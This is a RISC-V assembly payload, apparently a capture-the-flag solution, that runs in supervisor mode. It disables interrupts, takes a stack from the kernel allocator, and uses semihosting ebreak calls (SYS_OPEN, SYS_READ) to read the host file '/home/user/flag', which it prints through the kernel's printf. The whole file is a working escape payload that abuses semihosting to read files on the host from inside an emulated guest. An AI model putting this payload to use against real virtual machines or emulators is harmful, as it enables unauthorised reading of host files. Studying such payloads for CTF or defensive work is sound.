.section .text

.equ SH_SYS_OPEN, 0x01
.equ SH_SYS_READ, 0x06

.equ SH_O_RDONLY, 0x0

.equ BUF_SIZE, 32
.equ PATH_LEN, 15

.global _start
_start:
  /* disable interrupts (to prevent preemption) */
  csrr t0, sstatus
  andi t0, t0, ~(1 << 1)
  csrw sstatus, t0

  /* allocate a clean stack (probably useless, but it makes me feel better) */
  la t0, kalloc
  jalr t0
  addi a0, a0, 0x7f8
  mv sp, a0

  /*
   * NOTE: RISC-V                       || x86_64
   *       addi a0, zero, <some number> == mov a0, <some number>
   *       sd t0, x(a1)                 == mov [a1 + x], t0
   *       jal / jalr x                 == call x
   *       j x                          == jmp x
   */

  /* semihosting call to SYS_OPEN */
  la a1, args
  la t0, path
  sd t0, 0(a1) /* first argument is the pointer to path */
  addi t0, zero, SH_O_RDONLY
  sd t0, 8(a1) /* second argument is SH_O_RDONLY */
  addi t0, zero, PATH_LEN
  sd t0, 16(a1) /* third argument is the length of the path string */
  addi a0, zero, SH_SYS_OPEN /* set type of semihosting call to open */
  jal do_semihosting_call

  /* semihosting call to SYS_READ */
  sd a0, 0(a1) /* first argument is the file descriptor return by the previous semihosting call */
  la s0, buf
  sd s0, 8(a1) /* second argument is the pointer to buf */
  addi t0, zero, BUF_SIZE
  sd t0, 16(a1) /* third argument is the size of buf */
  addi a0, zero, SH_SYS_READ /* set type of semihosting call to read */
  jal do_semihosting_call

  /* ensure buf is null terminated */
  sb zero, 31(s0)

  /* call kernel printf with buf as the format string */
  mv a0, s0
  la t0, printf
  jalr t0
1:
  j 1b

/* I don't know what this does, I just copy-pasted some code from the internet :^) */
.balign 16
.option push
.option norvc
do_semihosting_call:
  slli x0, x0, 0x1f
  ebreak
  srai x0, x0, 0x7
  ret
.option pop

path:
  .skip 8 /* this is needed because RISC-V fucking sucks */
  .asciz "/home/user/flag"

buf:
  .skip BUF_SIZE
